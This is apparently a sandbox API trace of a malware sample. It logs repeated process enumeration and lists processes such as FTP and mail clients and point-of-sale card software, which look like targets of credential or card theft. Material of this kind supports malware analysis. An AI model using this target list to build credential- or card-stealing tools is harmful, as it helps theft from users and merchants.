szExeFile="RuntimeBroker.exe")) returned 1 [0235.956] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.957] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.959] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0235.960] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0235.962] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0235.963] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0235.965] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.969] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.971] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.972] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.974] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.975] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0235.976] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0235.978] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0235.983] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0235.986] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0235.988] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0235.991] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0235.994] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0236.046] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0236.048] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0236.049] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0236.050] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0236.052] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0236.053] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0236.055] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0236.056] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0236.060] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0236.062] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0236.063] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0236.065] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0236.066] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0236.067] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0236.069] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0236.070] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0236.071] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0236.076] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0236.078] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0236.080] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0236.081] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0236.083] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0236.085] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0236.086] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0236.088] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0236.130] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0236.131] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0236.133] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0236.134] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0236.136] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0236.141] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0236.142] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0236.144] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0236.145] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0236.147] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0236.149] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0236.150] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0236.155] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0236.156] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0236.158] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0236.160] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0236.161] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0236.163] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0236.165] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0236.186] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0236.188] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0236.190] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0236.192] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0236.193] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0236.195] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0236.196] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0236.198] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0236.204] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0236.206] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0236.208] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0236.210] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0236.212] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0236.217] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.219] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.221] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.223] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0236.225] CloseHandle (hObject=0x1b08) returned 1 [0236.225] Sleep (dwMilliseconds=0x64) [0236.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0236.366] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.368] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.369] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) 